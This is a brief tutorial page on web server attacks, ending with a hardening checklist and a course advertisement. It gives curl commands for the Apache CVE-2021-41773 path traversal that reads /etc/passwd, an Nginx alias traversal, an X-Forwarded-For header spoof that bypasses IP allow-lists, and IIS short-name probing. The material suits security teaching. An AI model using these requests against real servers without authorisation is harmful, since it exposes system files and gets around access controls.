Server Exploitation — Apache, Nginx & IIS Vulnerabilities

Web Server Exploitation

Web servers are the front door of the internet. Apache, Nginx, and IIS run 95%+ of all websites.

Apache Vulnerabilities

Directory Traversal (CVE-2021-41773)

curl -s "http://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
# Reads /etc/passwd by traversing directories!

Server Status Exposure

curl http://target/server-status
# Reveals active connections, IPs, URLs being accessed

Nginx Vulnerabilities

Misconfigured Alias

# If configured as:
location /files {
    alias /data/files/;
}
# Access: /files../etc/passwd
# Reads files outside intended directory!

Header Injection

curl -H "X-Forwarded-For: 127.0.0.1" http://target/admin
# Bypass IP whitelist restrictions

IIS Vulnerabilities

Short Name Scanning

# IIS reveals 8.3 filename format
http://target/secret~1.txt   # Exposes "secret_document.txt"

Server Hardening Checklist

• ✅ Disable directory listing
• ✅ Remove version info from headers
• ✅ Disable unnecessary modules
• ✅ Apply security patches immediately
• ✅ Configure proper CORS headers
• ✅ Enable HTTPS with HSTS
• ✅ Set secure cookie flags
• ✅ Implement rate limiting

🔥 Learn server security at ONLY4YOU →